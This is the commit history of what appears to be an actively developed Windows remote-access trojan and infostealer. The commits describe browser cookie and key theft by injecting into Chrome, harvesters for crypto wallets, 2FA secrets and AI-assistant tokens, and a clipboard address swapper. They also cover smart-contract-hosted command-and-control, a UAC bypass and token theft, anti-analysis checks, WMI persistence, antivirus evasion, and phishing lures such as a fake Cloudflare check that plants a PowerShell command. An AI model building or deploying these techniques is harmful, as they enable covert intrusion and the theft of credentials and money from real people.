Commit Graph
52 Commits
Author SHA1 Message Date
JYenn 46c44a0fe2 2FA and wallet harvesters: Steam maFile, Electrum, Monero
Steam Guard .maFile: plaintext JSON carries shared_secret (login codes)
and identity_secret (trade confirmations); parsed and reported per account,
password-encrypted files captured raw.

Electrum: unencrypted wallets report the mnemonic under 'seed' or the
master key under 'xprv'; encrypted wallets are flagged as such.

Monero: .keys files report the spend/view secret keys when plaintext, or
are flagged encrypted otherwise.

The console loot dump now renders the 'crypto' section with the other app
harvests. Verified end to end with real-format files: all three formats
land in the loot under the crypto field.

WinAuth deliberately omitted: its XML serialization could not be confirmed
from source, so shipping it would be an unverified guess.
2026-08-21 19:07:31 +01:00
JYenn b591f60056 crypto clipper and seed finder
Clipper (src/clipper, console 'clipswap'): swaps clipboard wallet addresses
for the operator's address per chain and captures BIP39 seed phrases.
Detection is checksum-validated, not regex-prefix: base58check (double
SHA-256, BIP13) for BTC/LTC/DOGE/DASH/XRP/TRX/NEO/ZEC, bech32/bech32m
(BIP173/BIP350) for BTC/LTC segwit, BCH, ADA and COSMOS, plus ETH/SOL/XMR/
XLM by prefix. Version-byte mapping resolves the DOGE-vs-NEO and BTC-vs-XRP
ambiguities. Verified 19/19 against spec vectors (BIP13/BIP173) plus
generated checksum-valid addresses and corrupted-address negatives.

Seed finder (stealer): sweeps documents and wallet app dirs for BIP39 seed
phrases, WIF (37/38-byte) and 64-hex private keys, otpauth 2FA URIs, and
wallet keyfiles, reported under the loot 'crypto' field. Verified end to
end on the box: a seed, both WIF forms, a hex key and an otpauth URI all
land in the loot.

Shared crypto_detect module (stealer) holds double SHA-256, base58/base58check
and BIP39 word-list lookup so the clipper and seed finder share one
implementation; the official 2048-word list is generated from bitcoin/bips.

Wiring: CLIP_* build options + wizard prompts, CLIPSWAP/CLIP_EVENT message
types, clipper.txt on the operator box.
2026-08-21 13:32:49 +01:00
JYenn 13e6ad7063 EtherHiding C2: resolve the TCP endpoint from a smart contract
The agent resolves its C2 endpoint from a resolver contract on a public
chain via eth_call (free, read-only), so the compiled binary carries no C2
address; rotating the C2 is one contract call and every bot picks up the
new value on next start. Pattern per the 2026 Remus analysis: eth_call
with the get() selector (0x6d4ce63c) against a public JSON-RPC provider,
the endpoint stored as a bytes32 host:port. Any failure falls back to the
compiled endpoint.

- src/transport/etherhiding.cpp/hpp: eth_call resolver, bytes32 decode,
  host:port parse, WinHTTP POST with hard timeouts
- agent: resolves before the argv/env override so an explicit endpoint
  still wins; HVNC_CHAIN_RPC / HVNC_CHAIN_CONTRACT env vars override
- setup.py: CHAIN_RPC / CHAIN_CONTRACT options; the guided wizard asks for
  the resolver under TCP; the summary and recreate line carry them
- tools/etherhiding.py: read (stdlib) and update (web3 optional, explorer
  instructions otherwise); contract source included, deployed via Remix
- verified: selectors checked against a real keccak implementation,
  contract compiles with solc 0.8.19, wizard and non-interactive flows
  emit the config end to end, mock RPC positive/negative tests, live
  HTTPS RPC probe degrades gracefully, and the full steal still recovers
  the v20 key through the chain-resolved agent
2026-08-20 22:39:40 +01:00
JYenn 8ee9393ea4 restore the proven v20 flow; drop the fork+APC experiment
The v20 master key is recovered the proven way: the agent spawns Chrome
suspended, reflectively injects the payload DLL, and the payload decrypts
the app-bound key through the COM IElevator inside the browser, pipes the
full loot back, and the agent terminates the host. The offline agent falls
back to the DPAPI v10 key. Verified on the box: identical loot across runs,
144 real v20 cookies decrypted to plaintext.

The Vidar-style fork+APC experiment is removed entirely, including its
syscall wrappers; the syscall engine is back to the pre-ABE baseline. What
the experiment taught is recorded in FUTURE_ADDITIONS: CryptProtectMemory
lives in crypt32/dpapi not kernel32, special user APCs are rejected for CET
threads, NtCreateProcessEx forks crash Chrome 151, elevated browsers refuse
access from a medium-integrity agent, and re-encrypting an unchanged buffer
corrupts live browser memory.

Diagnostics kept: inject errors surface in the loot instead of silently
falling back, and the payload reports an empty loot explicitly.
2026-08-20 22:11:17 +01:00
JYenn 813acd499f style: plain-language comments (no em dashes), brace style consistent with file 2026-08-18 23:40:21 +01:00
JYenn 9f883a64ef stealer: keep only lastpass/credman/protonpass with raw vault capture; drop bitwarden/1password/dashlane/nordpass/keeper/enpass/roboform (no at-rest break, unverified); pm_store_raw carries leveldb/sqlite blobs for offline crack (hashcat -m 6800, proton bcrypt user key); pretty-print loot json objects, terminal hides raw b64 2026-08-18 23:37:30 +01:00
JYenn 99dfeec1df stealer: drop keepass + filezilla harvesters (KeePass never persists master passwords, FileZilla unverified); downgrade riot/roblox to raw-evidence mode; rockstar SSO cookies from CEF cookie DB (full 32-byte host-hash prefix), battlenet HKLM TLS identity; credman binary blobs base64'd, json_escape high-byte escapes 2026-08-18 22:43:19 +01:00
JYenn 500a8ad427 stealer: real-app verified keepass/winscp/mremoteng harvest fixes; walk_dirs BFS replaces MinGW recursive_directory_iterator (drops entries after deep recursion, missed Documents kdbx); keepass probes per-user/portable config bases + Documents kdbx scan; winscp 0x-prefix tolerance (real ini value has none); riot lockfile Config\ + ubisoft legacy tree probes 2026-08-18 20:55:43 +01:00
JYenn 52ae8479e6 stealer: loot json grouped as password_managers/games/network_clients/ai_assistants; mremoteng + mobaxterm v26 decryptors (dpapi entropy, aes cbc/cfb8/ecb, gcm-full, pbkdf2-sha1, master-pwd note); battle.net/rockstar harvesters fixed to real data locations (localappdata cache, programdata agent/settings, documents saves); ai-assistant harvest (claude desktop leveldb token, codex auth.json, gemini config/history, opencode auth.json); console app count + robot icons; readme harvest groups 2026-08-18 11:25:00 +01:00
JYenn 9642aa4d69 stealer: roblox .ROBLOSECURITY decrypted in-process from RobloxCookies.dat (json base64 Cookies/CookiesData + raw dpapi blob fallbacks, legacy leveldb string scan), minecraft launcher accounts carried whole (launcher_accounts/profiles json, multimc/prism accounts.json, prism default install path) 2026-08-18 00:29:39 +01:00
JYenn 8f650edf88 stealer: enpass+roboform extension stores, minecraft+roblox harvesters, 14-key pm json (console), readme harvest list; comment sweep across headers + modules (research facts kept, restatement removed), beacon.hpp wire-format fix rides here 2026-08-18 00:20:00 +01:00
JYenn 9fe60da236 cdn: tunnel ingress uses tunnel_host (was hardcoded, 404'd every deployment), recreate line carries tunnel_host + cf access tokens, worker.js header carries the deploy step 2026-08-18 00:19:58 +01:00
JYenn c5a859ba82 readme: tagline, emoji bullets, de-dup features vs how-it-works, vt section, personal note, tightened wrappers prose, unslopped 2026-08-18 00:19:55 +01:00
JYenn c458ffd065 docs: demo gif, readme rewrite, loopback examples, gitignore console history 2026-08-16 22:07:01 +01:00
JYenn a095619ba4 wrappers bases: launch agent by absolute %PUBLIC% path (office shells from system32; relative misery.exe never resolves - chains were download-only) 2026-08-16 22:07:00 +01:00
JYenn 510cc30fe6 wrappers: docm/xlsm macros from office-authored compiled bases (pyopenvba rebuilds write source-only streams whose auto-events never hook - root-caused and verified live), inject runtime url+filename into word docvars / excel cfg-sheet cells instead of rewriting vba; drop pptm (auto_open never fires, thispresentation unauthorable via automation); bases ship in wrappers_bases/; readme updated 2026-08-16 20:33:34 +01:00
JYenn 666fa30e69 wrappers: move lnk chain to companion .cmd (av fastpath flags any lnk-launched curl cmdline), chr-encode vba cradles for amsi/content scans, fluid clickfix layout, decoy pdf body text; docs: comment cleanup across sources (stale/duplicate/verbose), readme corrections (polyglot_exe_zip stage_url, full command table) 2026-08-16 17:38:41 +01:00
JYenn 921006eaae cradles: drop powershell -enc for cmd/curl chains (av flags the ps forms); readme: trim av research bloat 2026-08-16 15:25:21 +01:00
JYenn 765e609902 setup.py: drop unused os import (pyflakes clean across wrappers.py + setup.py) 2026-08-16 14:59:16 +01:00
JYenn d0b9b7da5a clickfix lure: rebuild to the real Cloudflare Turnstile challenge clone (per 0x204/ClickFix-Turnstile kit + MS Threat Intel binancepizza sample + inde.nz teardown): 'Just a moment...' title, light theme, 2.2s 'Checking if you are human' preloader before the widget appears, site-domain line, reCAPTCHA-style checkbox that turns #4285f4 with a checkmark, Ray ID footer, exact kit step wording, Verify button; dropped the dark overlay + observe code box (the '# comment' trick breaks -EncodedCommand, verified locally: 'Cannot process command because a command is already specified'); headless gate proven live - puppeteer navigator.webdriver + HeadlessChrome UA both blocked, trusted CDP click in real Edge lands the full 427-char command on the OS clipboard 2026-08-16 14:53:17 +01:00
JYenn b9038cf239 payload wrappers: clickfix_html format - fake Cloudflare 'Verify you are human' page that poisons the clipboard with a hidden PowerShell cradle on the checkbox click and shows Win+R / Ctrl+V / Enter steps; command rides XOR 0x83 + hex like the in-the-wild kits, headless and non-Windows visitors get a benign spinner (per 2026 ClickFix lures: Rapid7 DoubleDonut, MS Threat Intel, PhishEye BW kit); verified 61/61 in the end-to-end harness plus real-JS DOM run (both copy APIs fire, gate works) 2026-08-16 14:29:13 +01:00
JYenn 1776789ed7 payload wrappers: lnk opens an embedded decoy PDF before the cradle (decoy-first, per 2026 DPRK/Patchwork/MoonPeak LNK chains), lnk/polyglot_exe_zip now need pikepdf; docm/xlsm/pptm decoys upgraded (docx core props, xlsm currency format/bold header/widths, pptm fills template slide 0), decoy pool normalized to title/body pairs, html/polyglot_html pages show the decoy text; README: MOTW delivery notes + refreshed operator view screenshot (renamed MiseryOperatorView.png) 2026-08-16 04:53:04 +01:00
JYenn a88718429e payload wrappers: 9 filetype delivery formats via setup.py -p (docm/xlsm/pptm macros with real decoy content, lnk cradle, pdf attachment+OpenAction, OneDrive-style html smuggle, iso, exe+zip and exe+html polyglots), STAGE_URL option, --list-formats, per-format manifest entries, README section 2026-08-16 04:37:01 +01:00
JYenn e09954fcd9 loot command + dist artifacts: 'loot' dumps last STEAL_RESULT JSON raw (16384 cap, lock-guarded), setup.py emits dist/<OUT>.exe + <OUT>.manifest.json (config snapshot + sha256, no auth secret), --list-artifacts 2026-08-16 04:08:12 +01:00
JYenn 38990e708d console UX: msfconsole-style bot registry (per-bot key+outbox keyed by eph pubkey over the stateless beacon relay, so concurrent agents no longer trample one global key), bot select/list/all targeting, dynamic prompt, command history with up/down recall persisted to console_history.txt, TAB completion with double-tab listing; no-bot guard on target commands; shell/elevate system commands, agent crash logging, JPEG quality 90 2026-08-16 03:50:04 +01:00
JYenn d534533c72 headless browser sessions: --headless=new for interactive+ghost, CDP recovery ladder (reattach on detach, Page.reload revive, bounded relaunch), stale DevToolsActivePort/Singleton cleanup on launch, last-frame replay so the view never blacks out, unsafe-swiftshader; boxed console banner 2026-08-16 03:18:09 +01:00
JYenn 198f1fcdab elevation: silent UAC bypass (PEB masquerade + CMSTPLUA/ICMLuaUtil) and SYSTEM token theft; wire elevate command 2026-08-16 01:12:29 +01:00
JYenn 8e64b360d7 ghost: seed sign-in cookies via CDP; Edge ABE vtable fix, 24H2 syscall sizes, relay chunked bodies 2026-08-16 00:29:40 +01:00
JYenn 11ce3c0def ghost: call SetBackupState before PrepareForBackup (VSS_E_BAD_STATE otherwise) 2026-08-15 22:02:00 +01:00
JYenn b02758ed1e ghost: copy profiles from VSS snapshots with plain-copy fallback 2026-08-15 21:59:04 +01:00
JYenn 0f48e974fc comments: fix stale claims, dedupe rationales, trim essays across src 2026-08-15 21:43:49 +01:00
JYenn 4073f259f3 docs: rewrite README (features, quick start, build, layout); correct hidden-desktop claims 2026-08-15 15:28:50 +01:00
JYenn 480c89ce6e cdp: occluded-renderer freeze fix; reattach/relaunch recovery; ghost nav, hvnc quality 2026-08-15 15:14:31 +01:00
JYenn c9ce88e507 hvnc: serialize session under one lock; direct-to-canvas capture; kill-on-close job 2026-08-15 05:41:11 +01:00
JYenn c559212825 build result text once; drop crash.log from repo 2026-08-15 05:33:30 +01:00
JYenn e05dee39dd ghost: stop() cleanup guard; log stopped only once 2026-08-15 05:30:49 +01:00
JYenn 61b5cd0caf docs: correct session table for CDP-rendered interactive browser; tidy hvnc code 2026-08-15 05:18:14 +01:00
JYenn c17155dc7f hvnc: CDP-rendered interactive browser view (DirectComposition is ungdi-capturable on hidden desktops) 2026-08-15 04:01:05 +01:00
JYenn 8d25dc2b15 hvnc: real-profile browser (quoted user-data-dir, copy once per session), double-buffered view paint 2026-08-15 03:51:59 +01:00
JYenn 2fa69c5e75 style: trim comment bloat in hvnc input/capture paths 2026-08-15 03:42:47 +01:00
JYenn 5633e841ef hvnc: split keyboard into CHAR (text) vs KEYDOWN whitelist to kill double chars, conditional activation/MOUSEACTIVATE to kill double clicks, persistent capture canvas to kill black flicker, forward DBLCLK 2026-08-15 03:41:14 +01:00
JYenn eb11e8ae79 hvnc: correct input synthesis (client coords, key lparam, real focus), stable diff resync; ghost profile-copy, beacon jitter/batching, console view rework 2026-08-15 03:38:13 +01:00
JYenn e549daeb4d docs: list harvested browsers and apps in stealer bullet 2026-08-15 00:32:16 +01:00
JYenn 4a3e3f1307 docs: restore README image sections 2026-08-15 00:31:08 +01:00
JYenn f3587510c7 docs: rewrite README with a feature bullet list 2026-08-15 00:30:26 +01:00
JYenn 314905126a transport: dirty-tile frame encoding, only send changed pixels 2026-08-15 00:30:22 +01:00
JYenn a7f0b17fef transport: ECDH P-256 key agreement, drop baked-in master key
setup.py now generates a P-256 console keypair: the public half compiles into config.h, the private half persists to .misery_key (gitignored, chmod 600) and is loaded by the console at runtime. Agent and console agree a per-connection AES-256-GCM session key from an ECDH handshake (plaintext KEY_EXCHANGE frame on TCP, ephemeral-pubkey prefix on beacon polls), so no secret key material ships in a binary. KEY= option removed; --rotate-key rotates the keypair.
2026-08-14 23:14:06 +01:00
JYenn 68b88f52c7 docs: tighten README wording
Fix the Ek0m attribution before/after apostrophe, reword the WMI guard explanation so it says what it does, and swap 'reports in' for 'checks in'.
2026-08-14 22:25:04 +01:00
JYenn 009d7a2b1f agent: anti-analysis fingerprinting and self-healing WMI persistence
Add a user-mode environment check (CPUID, firmware tables, MAC OUIs, guest drivers, PEB flags, debug-port queries, tool scans) that gates the TCP reconnect backoff. Extend debugger_present() with ProcessDebugObjectHandle (0x1E). Add WMI event subscriptions (T1546.003): a 15-minute timer relaunch plus a Run-key guard that recreates a deleted value, backed by an idempotent Run write that cannot retrigger itself. Document both in the README.
2026-08-14 22:21:45 +01:00
JYenn 06cb9147c2 builder/ghost hardening: persist master key, sweep stale ghost profiles
setup.py saves and reuses the master key in .misery_key (gitignored, chmod 600) so rebuilds keep one key and deployed agents stay reachable; --rotate-key forces a fresh one. Ghost sessions now use unique per-process profile dirs and clean up leftovers from crashed sessions, including a partial-start cleanup when the browser fails to launch.
2026-08-14 22:21:41 +01:00
JYenn 0003817596 Console beacon transport: HTTP relay front-end, outbox queue, REGISTER on beacon poll 2026-08-14 20:44:04 +01:00
JYenn ff4dbf3f2b HVNC + Misery: hidden-desktop and ghosted browser sessions with encrypted C2 2026-08-14 20:21:41 +01:00